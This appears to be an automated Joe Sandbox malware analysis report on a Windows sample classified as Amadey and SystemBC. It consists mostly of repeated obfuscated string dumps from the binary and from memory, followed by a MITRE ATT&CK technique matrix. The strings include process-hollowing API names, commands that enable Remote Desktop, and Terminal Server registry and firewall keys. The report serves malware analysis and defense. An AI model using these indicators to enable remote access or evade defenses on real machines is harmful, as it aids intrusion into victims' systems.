Source: Gxtuum.exe, 00000009.00000002.3748724251.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000A.00000000.4346447604.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000A.00000000.4346447604.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000A.00000002.4348591318.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000A.00000002.4348591318.0000000000921000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: XO4ioEY3nq.exe	String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe.0.dr	String found in binary or memory: net start termservice
Source: Gxtuum.exe.0.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	236 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	761 Security Software Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XO4ioEY3nq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: SystemBC

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
XO4ioEY3nq.exe